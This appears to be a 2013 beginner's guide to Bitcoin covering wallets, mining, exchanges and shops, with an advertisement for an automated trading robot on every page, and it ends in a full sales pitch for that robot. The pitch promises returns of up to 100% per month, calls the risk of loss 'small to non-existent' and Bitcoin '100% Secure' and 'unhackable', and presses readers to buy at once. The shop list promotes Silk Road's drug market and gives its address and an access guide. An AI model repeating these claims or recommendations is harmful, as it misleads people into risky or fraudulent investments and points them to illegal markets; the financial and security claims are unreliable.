+Leaving the technical view aside cryptocurrencies also
+have political meaning. They are considered to be a
+“counter-culture” movement similar to cypherpunks (tech
+and cryptography enthusiasts) and the traditional hacker
+spirit (e.g. Richard Stallman: “free software, free society”), to
+change the political society.
+Gavin Andresen, lead developer of “The Bitcoin Project”
+told forbes that cryptocurrencies are an attempt to have a
+decentralized “currency of the people” with no interfering
+of a central bank.
+One of the perks of distributed, global cryptocurrencies
+are that they’re basically fiat currencies, meaning that the
+value is dependent on the people’s estimate of it’s worth,
+i.e. its value is basically determined by supply and demand.
+Also they are not subject to central regulation, thus a
+central bank such as the Fed (Federal Reserve System)
+cannot lower or increase their value.
+A side-effect of decentralization is that it is hard to
+impossible for law enforcement to freeze, or wipe, user
+transactions and accounts. Law jurisdiction also has a hard
+time to track payments committed by users, this makes
+it hard to block what would otherwise be illegal niche
+markets (such as illegal drug acquisitions).
+
+The most famous representative for a cryptocurrency is,
+you probably guessed it already, Bitcoin ( ).
+฿
+What can I do with Bitcoins?
+Well, for one thing you can do what you do with traditional
+currencies, such as Dollars ($), Yen (¥), or Thai Baath ( ,
+yes the Bitcoin symbol is the same as Baath). You can buy
+฿
+products from various stores, you can trade them, obtain
+them by trading services, but also give Bitcoins as a gift.
+Although Bitcoins are usually an online currency, i.e. with
+no physical manifestation such as coins or paper, minting
+services have evolved1, that provide means to mint your
+digital Bitcoins in physical form (see Illustration 1). What
+we will discuss below are Bitcoin wallets (which are
+similar to regular wallets), Bitcoin trading markets (i.e.
+MT-Gox), and Bitcoin shops where you can get products for
+Bitcoins.
+Illustration 1: Casascius (Real) Bitcoin, taken
+from www.casascius.com
+1 https://www.casascius.com/
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Security (for non techies)!
+Security for Bitcoin users comes in various flavors, the
+most important ones:
+(1) Are Bitcoins fraud-resistant? Yes, Bitcoins are
+based on complex mathematical theorems that prohibit
+manipulation of coins in any way (i.e. change the value of a
+coin to an arbitrary amount).
+(2) Are transactions save? Bitcoin transactions don’t
+happen instantaneously. The transaction is verified by
+the peer-to-peer network of Bitcoin users, in a best-
+effort analysis. If there are multiple positive confirmations
+(many more than negative ones) from the network, the
+likelihood of a valid transaction is very high. The down-
+side is that therefore the transaction can take a few
+minutes.
+(3) Erroneous transaction? If you send Bitcoins to
+someone and want them back, they’re gone. So, Bitcoin
+transactions are not reversible (obviously if the receiver
+sends the money back you’re ok). But keep in mind: If you
+send money you better make sure that the address is
+correct.
+(4) Is my wallet save? Ah yes, just as in real live you
+absolutely have to take care of your wallet. What a wallet
+is and various implementations (yes, a wallet is a piece of
+software) is covered below.
+(5) Do shops scam? There are many trusted shops, some
+of them will be discussed below. Again as in real life, there
+are evildoers out there to get your money! Select carefully,
+check their ratings and you will do just fine.
+(6) Last but not least, are transactions anonymous?
+Bitcoin increases the anonymity of traditional payment
+systems manifold. Whereas traditional payments over
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+wire, credit card, etc. can be tracked easily, since sender,
+recipient, and transfer institute (i.e., the bank) are always
+known, with Bitcoin usually only a recipient id and sender
+id (both being public keys that can be changed arbitrarily
+often), and an IP address are known. If none of these
+items can be mapped to a user the identity of the
+participants in the transaction is undisclosed.
+Mining? Is it reasonable?
+Bitcoins are based on blocks. Blocks are data containing
+information about past transactions and contain a hard
+to solve mathematical problem. To add a block to the
+block-chain demands some serious processing power.
+As an incentive whoever solves this problem and sends
+the solution to the network (i.e. is able to produce a block)
+receives (at the time of writing) 25 Bitcoin as reward.
+If somebody solves the operation before you do it, your
+work is lost and you receive no reward. Furthermore
+the difficulty of the problem is increased or decreased
+every 2016 correct solved blocks, depending on the total
+amount of calculation power available in the mining
+network. In addition, the reward per block is halved every
+210.000 solved blocks. For that reason, also the number
+of existing coins is limited to 21 millions. Given the
+current progression in mining capability the last coin is
+conjectured to be mined between 2033 and 2140.
+Summarizing: Who offers calculation power to the
+Bitcoin network is rewarded with coins. Hence, every
+day new Bitcoins are created from miners and new miners
+join the network every day. In order to keep the complexity
+of mining steep self-regulating algorithms have been
+included to Bitcoin to adjust to new processing power.
+
+Therefore the work or mining becomes harder for each
+block.
+Assuming you had decided decided to start mining in 2009
+and never sold a mined coin prior to 2013, you should be
+rich by now.
+If you want to you can start today, you can still make
+some money, but keep in mind: the golden mining era
+is past.
+Let us give you more details about why that is: The amount
+of total existing Bitcoins is limited and the amount of
+Bitcoins that can be mined per successful solved block is
+also fixed. The performance when you are mining Bitcoin
+is measured in MH/s, meaning millions of hash operations
+executed per second by your PC. In 2009, a normal PC with
+a common CPU was able to produce hundreds of Bitcoins
+per day, basically because the network had low computing
+power and there were almost no transactions (A geek
+hobby). But with the success of Bitcoins, the rising of
+brokers and the increasing value in dollars per coin, more
+and more users discovered this fascinating world. Hence,
+mining became ever more unyielding. To counteract this
+trend CPUs were replaced by GPUs, which were replaced
+by Multi-GPU rigs and now ASICs (Application Specific
+Integrated Circuit), hardware specifically designed with
+only one purpose: mining Bitcoin.
+For this reason, mining Bitcoins with a common CPU
+is useless today. Mining with a good AMD distinct GPU
+(AMD 78xx, AMD 79xx) is ok, but will not make you rich.
+Making money heavily depends on your local energy price,
+hardware costs, and (obviously) the exchange value of
+Bitcoin.
+Using an NVIDIA card at the time of writing also seems to
+be useless, since there are no good GPGPU implementations
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+for mining for this manufacturer. To give you an impression
+about the current situation, at time of writing, an AMD 6970
+is able to produce 0.0077 BTC per day, this is less than 0.8$
+at an actual Bitcoin price of 100$.
+We recommend to do the math before you start mining.
+A Tip: Use a mining pool where you can share the work
+(and also the reward) based on the provided calculation
+power with other miners.
+The links at the end of this chapter give you information for
+mining pool pages and Bitcoin itself. We suggest you make
+use of BTC Guild or Slush’s pool. They provide as a good
+starting point.
+Links:
+Here some comparisons and calculation links to give you
+an idea and help you to make your math.
+[1] http://bitcoin.org/bitcoin.pdf
+[2] Hardware comparison for GPGPU mining
+http://mrlithium.blogspot.co.at/2013/02/bitcoin-mining-
+hardware-comparison-7850.html
+[3] To give you an example of the power of special mining
+hardware in comparison to GPGPU
+http://bitcoinexaminer.org/7-awesome-asic-bitcoin-miners/
+[4] Calculation sheet to determine how much money your
+mining rig brings you
+http://www.bitcoinx.com/profit/
+[5] Bitcoin Mining pools
+https://en.bitcoin.it/wiki/Comparison_of_mining_pools
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Conclusion
+If you want to start with Bitcoins and you don’t want to
+spend money on brokers, you can still mine coins. But this
+is pretty much to search for gold nuggets in a river or trying
+to find the needle in a haystack. Maybe you find something,
+maybe you waste your time. Our suggestion: if you want
+to make money with Bitcoins, don’t mine them, trade
+them!
+What do I need to start?
+The first thing that you should install is a so called Bitcoin
+wallet. Bitcoins are a decentralized currency. No bank
+account is needed. For that reason, a Bitcoin wallet is
+the counterpart to your real money wallet. You can store
+your Bitcoins in it, use it to send Bitcoins to other persons,
+and of course receive Bitcoins even if you are offline. If you
+lose your wallet, forget your password, or (heavens forbid)
+somebody steals it, then your contained Bitcoins are lost.
+Bitcoins are like real banknotes, they belong to the person
+that owns them. So keep your wallet secure, make
+regular backups and choose a secure password!
+A wallet in itself is a very small piece of software for
+windows, linux, or your smart-phone. You can see the
+transactions in it, you can receive Bitcoins and send
+Bitcoins using it. There is nothing more, small, simple, easy
+to use.
+Bitcoin.org is a good starting point if you need a wallet. You
+can find several different wallets there. We recommend the
+use of an open source version of a wallet, don’t use web-
+based wallets or versions where the source is not available.
+Remember: the web is dark and full of terrors (Yes,
+nerdling, this is a direct quote from GoT).
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+We suggest the original version of the wallet called bitcoin-
+qt. But also the mobile version works very well and you can
+have your coins always with you.
+Bitcoin-qt (windows version)
+Download the wallet from bitcoin.org first. After the
+installation, you will see the main page of the wallet.
+Now you have to wait. As explained, there is no central
+authority in the Bitcoin network. Check the validity
+of the transactions: No Bitcoin can be spent twice
+from a user. You cannot send or receive Bitcoins until
+this synchronization is done. Unfortunately this needs
+time. Actually you have to download around 8 GB of data
+containing the block-chains. If you have a limited available
+data rate, you can also order the block-chains via DVD.
+After you start your wallet, you will see the following
+screen. As you can see, also my new installed wallet was
+out of sync and I had to wait several hours till the system
+was synchronized.
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+After that initial step is done, it is highly recommended to
+encrypt your wallet. Over “Settings-> Encrypt your wallet”,
+you are able to protect your wallet. For every transaction
+you will need to enter your secret password from now on.
+So please use a secure password and store it in a secure
+place. If you loose your password, also your Bitcoins are
+lost. There is no central authority that can reset your
+password, so be careful!
+Bitcoins are sent and received using addresses.
+Addresses are unique, long, alphanumerical strings
+that represent the id of the person you want to send
+Bitcoins. If you’re not careful it is entirely possible that
+you send Bitcoins to the wrong person! Sending Bitcoins
+to non-existent addresses does not work. To protect your
+anonymity, a good wallet usually creates a new address for
+each transaction. If you’re not interested in that feature you
+can also opt to always use the same address. For example if
+you send Bitcoins to some broker.
+We strongly advice you to change the address for every
+single transaction, since transactions are (as opposed
+to urban legend) not anonymous! In order to secure
+transactions, every single step in the transaction history is
+recorded. But since you can change your address for every
+transaction, you improve the protection of your anonymity
+even if all steps are logged.
+Synchronization of your wallet allows you to send and
+receive Bitcoins. The fancy part of synchronization is that
+you don’t have to be online to receive Bitcoins. In fact, if
+you are offline and receive some coins, the transaction(s)
+corresponding to the coinds is stored in the global
+block-chain. Hence, when you finally come online and
+synchronize your wallet Bitcoins come trickling in.
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Important to remember here is, Bitcoin transactions
+not instant are (Yoda-speak!). You can send Bitcoins
+to a friend, but in order to avoid fraud, the nodes in the
+network have to confirm your transaction. You need to
+have 6 confirmations in order to have a 100% confirmed
+transaction. Usually this needs around 10 minutes, but
+since this is a dynamic network, sometimes some more
+time is needed. From the first confirmation on, you are able
+to re-transfer received coins to another wallet.
+So, now lets start. As a little welcome gift, go to freebitcoins
+[1] and get your first 0.02 BT for free!
+Links:
+[1] https://freebitcoins.appspot.com/
+[2] If you need a more detailed description about the
+installation of bitcoin-qt, please have a look at https://
+en.bitcoin.it/wiki/Getting_started_installing_bitcoin-qt
+[3] Also an important further reading is http://bitcoinplaza.
+blogspot.co.at/2013/02/how-to-backup-bitcoin-wallet-walletdat.
+html where you can find information about how to backup
+your wallet. Remember, if your wallet is lost, your Bitcoins
+are also lost and nobody can give it back to you.
+Mobile Apps
+You may want to carry your Bitcoins with you, to pay at
+a local restaurant for example. Or maybe you want to
+trade them with local friends or resellers. Then a mobile
+application (or App, as Hippsters call them) may be the
+right tool for you. You can send and receive coins via QR-
+code or use NFC. For more information about mobile apps,
+visit the following sites
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Links:
+[1] http://bitcoin.org/en/choose-your-wallet
+[2] https://blockchain.info/wallet/android-app
+[3] https://blockchain.info/wallet/iphone-app
+Where to buy Bitcoins
+There are several possibilities to get Bitcoins. You can mine
+them as explained in a previous chapter. But nowadays this
+method is not a top choice anymore. If you want to make
+money with Bitcoins, becoming a Bitcoin trader is the best
+choice.
+There are different brokers out there. A Bitcoin broker is
+like a regular stock exchange where you can buy or sell
+coins.
+The first place that you should visit is bitcoincharts [1]. This
+is a site, where you can see the actual exchange values for
+different brokers and currencies, but also statistic values
+that should allow you to plan your purchases.
+As you can see, there are several brokers out there. We
+will discuss the biggest two in the next pages, Mt.Gox and
+BTC-E.
+[1] http://bitcoincharts.com/markets/
+Mt.Gox
+Mt.Gox [1] (pronounced “Mount Gox”), a Japanese company
+founded in 2009, is by far the biggest Bitcoin exchange
+on the web. In July 2013, around 54% of all exchanges of
+Bitcoins were made using Mt.Gox. If you want to trade
+Bitcoins, Mt.Gox should be your starting point.
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+You can trade Bitcoins for US Dollar, Euro, japanese Yen and
+many other currencies on Mt.Gox. It is also a very mature
+and nowadays very secure platform to trade.
+[1] http://www.Mtgox.com
+Registration
+Mt. Gox has a long history of hacks, attacks and problems
+in its past. For this reason, the company spend a lot of time
+and money to create a secure platform, avoid fraud and
+become a more serious player (for example it implemented
+measures against money laundering). Unfortunately this
+also means that the registration is a little bit more complex
+than expected.
+First of all you need to register on the site. Because the high
+amount of new accounts per day it can take a little while
+till your receive the confirmation mail, so be patient.
+Once you received a confirmation mail, you have to provide
+your credentials like name, address, city etc. Mt.Gox is not
+the right place for persons with a strong sense for privacy
+anymore. If you want to trade, to deposit or withdraw
+money in your currency, you have also to conform your
+credentials sending copies of an identity document and a
+bill (gas, TV, ect) via fax or email. The confirmation of this
+documents takes 5 to 10 days. Doing so, Mt.Gox wants to
+prevent any sort of criminal or illegal transactions.
+During the last 12 months Mt.Gox became a very serious
+bitcoin exchange that wants to have nothing to do with
+some of the more semi-legal services on the web.
+But there is no immediate need to provide your credentials
+if you buy bitcoins somewhere else and want only to trade
+with your bitcoins. Only if you want to remove bitcoins
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+from your Mt.Gox account or if you want to send the
+earned money, you have some limits till you confirmed
+your identity. As mentioned, Mt.Gox tries to avoid money
+laundery and bring Bitcoin to a serious level.
+Furthermore you should secure your account with a Google
+Authenticator key. You can download Google authenticator
+via Apple Appstore or Google Play for free. The provides
+key changes every couple of minutes and protects your
+Mt.Gox account from password stealing. You can add your
+Authenticator key in the Security center of Mt.Gox.
+BTC-E
+BTC-E is the second most largest broker for Bitcoins.
+Since it is by far smaller than Mt.Gox, BTC-E tried
+another strategy to be successful: the security is lower
+and the anonymity higher on BTC-E. There is no need to
+provide any kind of further credentials to trade on BTC-E.
+Username, password and email, that’s all needed to start
+making money on BTC-E. Furthermore BTC-E has another
+special feature: alternative cryptocurrencies!
+Excursion: alternative “cryptocoins”
+What we didn’t wrote till now is, that Bitcoin is not the sole
+crypto-currency on the web. With the success of Bitcoin,
+and based on its open-source principles, other, most
+smaller alternative coin-types came up. Usually the trading
+amount is smaller, the price lower and they are somehow
+related to Bitcoin, meaning that if the Bitcoin market value
+goes up, also the value of this alternative coins rises and
+reversal.
+So, whats the difference between Bitcoin and lets say
+Litecoin or Featercoin you may ask. To be honest, not much.
+One of this alternative cointypes changes the mechanism
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+behind the mining, so that ASICs and GPUs have not such a
+big advantage against CPUs, other decreases the time till a
+transaction is validated in order to speed up the transfer of
+money. Probably none of this newer cryptocurrencies will
+became as famous and high valuable as Bitcoin, but that
+didn’t mean that you cannot make money with them. Check
+the links below, read about their features and trade with
+them if you want!
+Links:
+Some of this alternative coins are
+[1] litecoins: https://litecoin.org/
+[2] featercoins: http://feathercoin.com/
+[3] ripplecoins: https://ripple.com/
+[4] min-coins: http://www.min-coin.org/
+Alternative exchange methods
+But there are also alternatives to web-brokers! For example
+if you want to be totally anonymous, you can look for local
+reseller in your town or city. Localbitcoins [1] offers such
+a service. And here is how it works: On Localbitcoins you
+can create an advertising if you want to sell Bitcoin to
+people in your own city. Or you can look for persons that
+sell Bitcoin near to you. Usually the price for coins is higher
+then, usually 5-10% over the actual market price in Mt.Gox.
+If you want to sell coins, wait till sombody answers to
+your advertising via mail. Then decide on a location, meet
+the person, let you show the money and then transfer the
+coins preferentially using your smart phone. When the
+transaction ifs confirmed, take the money and the deal is
+complete. Simple, secure, and totally anonymous!
+Links:
+[1] https://localbitcoins.com/
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Top 5 Bitcoin exchanges
+by trading amount
+As we have seen above there are multiple ways to attain
+Bitcoins, ask a friend to exchange some of his Bitcoins with
+some other currency (Dollars, ..), user LocalBitcoins, trade
+wares (i.e. become a shop owner), visit a website such as
+BTCQUICK [1] and fund your wallet with your own money.
+From their website:
+„Purchasing bitcoins through btcQuick is the fastest
+way to buy Bitcoins with a credit card or debit card.
+The entire process can take as little as 10minutes of
+your time.„
+Links
+[1] https://btcquick.com/beta/
+When you have a wallet full of Bitcoins you are able to buy
+products, but there are ways to increase their numbers: The
+Bitcoin Exchange Market (or markets).
+There are many different market places, but we restricted
+ourselves to 5 of them since they, by far, outperform
+their competition in terms of market volume, Mt.Gox
+[2], Bitstamp [3], BTCChina [4], BTC-e [5], Bitcoin [6]. For a
+sample view of Mt.Gox consider (Illustrations 2 and 3).1
+1 We only show a screenshot for Mt.Gox since it is the largest exchange market
+out there (it’s volume is larger than the next 5 markets combined).
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Illustration 2: Mt.Gox, the largest market exchange
+Illustration 3: User Console for Mt.Gox
+The Bitcoin values tend to fluctuate from market to market.
+This is a wonderful way to use arbitraging strategies to
+attain trading profits. To have an overview on all the Bitcoin
+values per market-place have a look at Bitcoin-Charts [7].
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Links
+[1] https://btcquick.com/beta/
+[2] https://www.mtgox.com/
+[3] https://www.bitstamp.net/
+[4] https://btcchina.com/
+[5] https://btc-e.com/
+[6] https://www.bitcoin.de/
+[7] http://bitcoincharts.com/markets/
+Top Bitcoin debit cards
+Assuming you made some „serious dough“ by leveraging
+stock market techniques (or the Bitcoin robot) you may
+want to exchange it to some other currency, or to cash it out
+via debit card on-the-fly.
+At the moment of writing there are not too many
+possibilities for debit cards around. The first one we found,
+BitcoinCard [1] is actually a debit card based on normal
+currencies, such as Euro (€). The benefit this card has
+though is that it can be funded via Bitcoins. Which turns it
+to a Bitcoin card! Hence quoth the internet:
+„Prepaid credit cards are not new. However, a prepaid
+credit card that can be funded with bitcoins is. The
+BitcoinCard is a credit card that can be funded via
+BTC.“
+What say the people behind BitcoinCard?
+“The card works as a normal prepaid credit card. The
+difference is users can buy it with bitcoins, and fund it
+with bitcoins.”
+The second card is a true Bitcoin debit card, according to
+the guys from Coindesk [2]:
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+„A new way to pay by bitcoin is on the horizon, a
+bitcoin debit card called iBTCard. That name stands
+for International Bitcoin Transfer Card. The company
+behind the project, Tradecoinz LLC, is hoping to
+provide an alternative payment method to VISA
+and MasterCard, but in a way that most people can
+recognise and understand.“
+This sounds very promising indeed.
+Links:
+[1] http://thebitcoincard.co.uk/
+[2] http://www.coindesk.com/
+[3] https://ibtcard.com/
+Top 10 e-shops accepting bitcoin
+So you made some money with trading, how best to spend
+it than to buy your girlfriend, wife (mistress maybe?) a nice
+present. Where you ask? Right here, we have the top 10
+companies that accept Bitcoins for their products.
+(The Notorious) Silk Road
+Unsurprisingly the biggest shop for Bitcoins is Silk Road
+[1] with a rather interesting but in most countries illegal
+selection of fine wares.2 As you can see in Illustration 4
+Silk Road literally deals in drugs. Silk Road can’t be visited
+like a regular website, it is based on Tor Hidden Services [2].
+For a guide on how to use Tor Hidden Services and access
+Silk Road check out [3]
+2 Disclaimer: If you buy something from Silk Road make sure it is legal in your
+country. We don’t advertise and/or suggest you do any such thing. Do this at your
+own risk.
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Illustration 4: Silkroad screenshot taken from [8]
+(Global Payments) BitPay
+BitPay [4] provides means for your web shop (website)
+to accept payments with Bitcoins without the hazzle of
+market value fluctuations. Through BitPay new Bitcoin
+accepting shops are created every day! Directly from their
+FAQ:
+„BitPay is an electronic payment processing system
+for the bitcoin currency. We enable online merchants
+to accept bitcoins, as a form of payment, just as they
+accept payments from Visa, Mastercard, or Paypal.“
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Illustration 6: Use bitpay to reach the whole world in terms of
+acceptable payments
+Illustration 5: Use bitpay to reach the whole world in terms of acceptable
+payments
+(Let’s play dice) Satoshi Dice
+For Satoshi Dice [5] you don’t need to run any client
+application or even have an account on their site. To play,
+place a Bitcoin transaction to one of Satoshi’s addresses
+(each address having a different probability of winning).
+That’s it, simple really!
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Recently Satoshi Dice has been sold for $11.5 million [6].
+(Start digging) Butterfly Labs, Avalon
+If, by any chance, you lost a lot of money while gambling
+(see above) make sure you have one of Butterfly Labs [7] or
+Avalon’s [8] hardware miners working for you at home. With
+these rigs, such as the 50 GH/s Bitcoin Miner from Butterfly
+Labs or the 60 GH/s Monster from Avalon you might make
+up for your losses. As you have probably guessed, Butterfly
+Labs build specialized hardware for Bitcoin mining activity.
+Illustration 6: Butterfly mining page (if you want to mine)
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Illustration 7: An alternative, Avalons ASICs, with very fast miners
+(We love Bitcoin) Bitcoinstore
+If you want to buy some general ware, digital cameras, pcs,
+laptops, motherboards, hard drives, security devices pretty
+much anything a tech lover needs visit Bitcoinstore [9].
+(Trade me) Coinabul
+Everyone knows that in order to attain stable results with
+investments diversification is in order. Hence, spreading
+the risk among multiple investments. Coinabul [10] lets
+you buy gold and silver coins via Bitcoin (it has never been
+simpler to start trading the precious metal market).
+Links:
+[1] http://silkroadvb5piz3r.onion/
+[2] https://www.torproject.org/docs/hidden-services.html.en
+[3] http://silkroadaddress.com/
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+[4] https://bitpay.com/
+[5] http://www.satoshidice.com/
+[6] http://thenextweb.com/insider/2013/07/19/first-major-
+bitcoin-acquisition-sees-gambling-site-satoshidice-sold-for-11-
+5-million/
+[7] http://www.butterflylabs.com/de
+[8] http://launch.avalon-asics.com/
+[9] https://www.bitcoinstore.com/
+There are many, many more shops that allow you to use
+Bitcoin:
+Providers/Hosters
+TrilightZone Providing Privacy Services Since 2005 -
+Including Offshore Cloud Services - Choose from Multiple
+Offshore Jurisdictions!
+Rocket Tech Storage Online storage for $0.02/GB/month,
+SSH/SFTP access, Bitcoin always accepted.
+Bit-Host exchange bitcoins for your favorite File-Hosting
+services premium like Rapidshare, Uploaded.net/ul.to or
+Netload Premium subscription and SAVE!
+File sharing
+MEGA File sharing and encrypted online storage
+SmartFTP FTP/SFTP Client
+BitcoinService.co.uk (info), filesharing site
+Filenium.com - Premium accounts at file sharing and
+storage sites
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Music
+Digital-Tunes - Legal digital downloads of Drum & Bass,
+Dubstep, Bass Music & other electronic music, in WAV, FLAC
+and MP3 formats skin contact Accepts bitcoin payments
+for album download.
+RPG Beats Accepts bitcoin payment for hip-hop beat leases.
+To list all shops is infeasible. Many more online shops for
+consumer electronics, music, design, art, outdoor sports,
+exchange markets, etc. (with new ones added daily can be
+found here [1]).
+Links:
+[1] https://en.bitcoin.it/wiki/Trade
+
+Get Your Automated Bitcoin Trading Robot at www.btcrobot.com
+Automated Bitcoin trading?
+How Can You Profit with Bitcoin?
+Just a few years ago, the only way to profit was through so-called
+“Mining”.
+This is the “Hard Way”, for which you receive coins by helping the
+system to verify secure transactions. This process requires a lot of
+computational power, typically multi-core CPU system or specialized
+Bitcoin miners. The algorithm is designed in such a way that mining
+becomes more and more complex and less and less profitable with time.
+Mining days are over!
+The time has changed and we are the ONLY solution available to
+increase your Bitcoins!
+THE Inflation FREE currency!
+Bitcoins are limited in amount... you can NOT produce them out of
+thin air nor reprint them, thereby making them safe from inflation!
+100% Secure! NON-CLOSABLE!
+Bitcoins are unhackable lines of code that you can even stash on
+your cellphone in an E-wallet or download to a USB stick and keep
+them SAFE! Pay using them, store them, collect ‘em... the option is
+yours!
+To make it even better, Bitcoin is decentralized. No one owns it...
+it’s like the Internet... you can shut down a machine but you can`t
+kill it. It’s a living and expanding entity on its own.
+So, no matter how hard a government might try to put it down...
+they cannot succeed!
+The bottom line to EARN them, however, is that...
+
+Forex is DEAD!
+Automated Bitcoin
+Trading is the ANSWER!
+Imagine if you had a fully automated Bitcoin trading robot, working for you on
+autopilot around the clock?
+Trading Around The Clock??? Even on weekends??
+Forget Forex limitations such as not trading on weekends, Bank Holidays and
+other big bank B.S.
+Bitcoin is traded around the clock, 24/7, 365 days a year.
+There are no banks controlling it, meaning we don’t have any bank limitations
+on the trading time, thereby giving you a unique opportunity to profit around
+the clock, two extra days a week!
+The robot does not sleep, does not take holidays or stop on weekends. It is an
+everlasting profit machine at your fingertips!
+TRADING ACCOUNT: $2,714 and Counting!
+It can be yours right now and it’s a piece of cake to install!
+SETUP YOUR ROBOT NOW!
+
+Why Does
+the BitCoin Robot Work?
+Bitcoin is a young The higher the market No leverage trading: You The robot is analyzing
+growing market. volatility, the higher the are trading only on your the prices in all Bitcoin
+Relatively small amount profit. During volatile own money without exchange marketplaces
+of Bitcoin exchange months, the profit can taking Huge leverage in real time, exploiting
+marketplaces ensure reach up to 100% per from the brokers like in the gaps and using
+huge price fluctuations month! During regular Forex, meaning the risk hedging techniques
+during the trading day, months, it gives a stable to lose all your money is to take advantage of
+which our robot takes “conservative” growth of small to non-existent. almost bulletproof profit
+advantage of. 10-20% per month. opportunities.
+How Does It Work?
+Simply open an account Activate our robot and let it Withdraw profits.
+with one of the trusted trade for you!
+Bitcoin trading exchange Choose between a simple
+marketplaces Windows version or a fully
+Deposit an initial amount pre-installed VPS version:
+in Bitcoin or USD. You can No installation, no hassles.
+start as low as $100 ! The robot comes fully
+pre-installed in your web
+browser-based members
+area! Nothing to setup or
+configure. Human error-free
+& 100% autopilot.
+No backtests, NO what ifs!
+This is not a forex robot or MT4 based indicator B.S. It`s a custom
+programmed bot that trades real money... no monopoly cash
+playtime but real results!
+
+What’s Behind
+the Bitcoin Robot Trading Engine?
+When it comes down to technology and IT
+developments, hats off, nothing comes close to
+Russian brains!
+We united our efforts with a team of the brightest
+Bitcoin traders and programmers from Russia.
+Don’t get me wrong though. It’s hard to be a
+pioneer in the field. It’s even harder to develop the
+first fully automated system in the new market.
+Yes, it was not easy. Over 2 years in development,
+plenty of trial and error.
+We really wanted to perfect it. Over 127,199 lines
+of code. Sleepless nights and betatests in private
+groups.
+
+FAQ:
+1. If the robot wins money, who loses it? Does the Bitcoin
+exchange lose money if I win and eventually ban my trading?
+Good question. No, the Bitcoin exchange market does not lose any
+money due to your profitable trading. In fact, it is gaining a lot of
+money because they charge 0.4% commission on every trade. For
+example, yesterday their exchange volume was $512,213 , which
+means +4000 BTC commission made. The losers are other human
+traders that do not use automated trading approaches and trade
+manually or just pay too much when buying Bitcoin!
+It’s harsh but money is not produced from thin air. It comes from
+losers that don’t have advanced tools like our Bitcoin robot and
+keep trying their luck with old outdated manual systems.
+2. How much money do I need to start? Thousands of dollars??
+No, you can start as low as $100. This is the main advantage of
+Bitcoin trading, the entry limit is very low.
+3. Is it risky? Can I lose the deposit?
+You are trading only on your own money without taking huge
+leverage from the brokers like in Forex, meaning the risk of losing
+all your money is small to non-existent.
+4. Will it provide 100% winning trades?
+100% winning systems are impossible, so don’t be fooled by so
+called “Get Rich scams” promising that.
+
+Obviously, our robot is not a crystal ball and you will have some
+losing as well as winning trades. The goal is to make a solid net
+profit monthly.
+4. Do I have to keep my computer ON all the time or buy a VPS
+server like with forex?
+You can choose between two options. The most affordable Silver
+plan comes with Windows based software which trades from your
+own computer. Similar to you trading Forex on Metatrader4 on your
+computer. So it must be on at all times during trading.
+If you choose the Gold Plan, the robot comes fully preinstalled
+in your web browser based members area! Nothing to setup or
+configure. It’s completely human error-free & 100% autopilot.
+5. What if my internet connection gets interrupted during
+trading?
+No problem. The robot will resume trading from the point it left and
+catch up on the trades.
+However, if you experience constant internet connection issues in
+your area, it’s safer and more profitable to use the Gold plan where
+the robot is pre-installed on our trading VPS for you!
+5. What if many people trade it, will it become less effective?
+No. The beauty of Bitcoin trading robot algorithm is that it uses a
+special trade stealth technology which allows to separate different
+traders and avoid all of them taking the same trade at the same time
+overloading the market liquidity.
+This way robot stays effective even if many people trade it
+independently.
+
+6. Is it better than Forex?
+Yes. Less risky. More profit. No broker spreads or ridiculous
+commissions. No bank regulations and fees.
+You get all the profit. You trade 24/7 not 24/5. No bank holidays. You
+get profit around the clock. No need to install Metatraders and other
+complicated software. No need to sit and watch charts. No need to
+buy expensive VPS servers or keep your computer online.
+7. Do you trade it yourself? If it is so good, why would you sell
+it?
+Yes, we do trade it and you saw the live trading proof. Why do we
+sell it? We could probably write something hypocritical here, that we
+want to make everyone rich and happy, but I will be honest with you.
+We are just greedy. If you have an opportunity to make more money,
+will you pass it by? The amount of traders using the robot does not
+affect its effectiveness, so we thought, why not release it to a limited
+amount of pioneers who, like us, can take advantage of a growing
+opportunity.
+It’s like when people invented the plane; nobody drives such long
+distances in a car anymore! Same here. Why bother with manual
+trading, spending the whole of your life glued to the PC when you
+can use this new technology of automated Bitcoin trading!
+The world has changed. And so have the tools!
+
+Here is what
+I want you to do next:
+Get in on the Ground Floor of this Breakthrough Technology!
+The future is one step away from you.
+Click Add to Cart Button and let’s get started!
+It’s time for you to take action and
+secure your spot.
+Remember, the early bird catches the worm.
+You already missed the early founding Bitcoin days with mining
+opportunities. It’s still not too late to jump in on the train that is
+about to leave. Get the Trading System Poised To Create a New
+Generation of future, successful traders. Pioneer this kind of
+currency trading with an unlimited potential of future growth.
+
+To be a successful money maker, you need to stray off the beaten paths... and
+THIS is your chance now! Who knows what will happen in a year from now?
+What if everyone owns Bitcoins by then and the market volatility sinks?
+Thousands of people are buying Bitcoin everyday... you can get ahead of them
+and profit from the misinformation and from people that pay too much to
+purchase Bitcoins... but you need to act right here, right now!
+By the time the gold rush is over, you could have earned tens of thousands of
+dollars with a small one-time investment !
+The Bitcoin robot is backed by our 60 day money back guarantee... either set it
+up and profit OR get your money back. You can try it out for a full 60 days, all the
+risk is on us.
+Make sure you secure your financial freedom and don’t miss it.
+You are in the right spot at the right time. It’s up to you now to
+take action and secure your own passive money-earning Bitcoin
+robot... and start withdrawing money as early as TOMORROW!
+Sincerely,
+the Bitcoin Development Team
+www.btcrobot.com
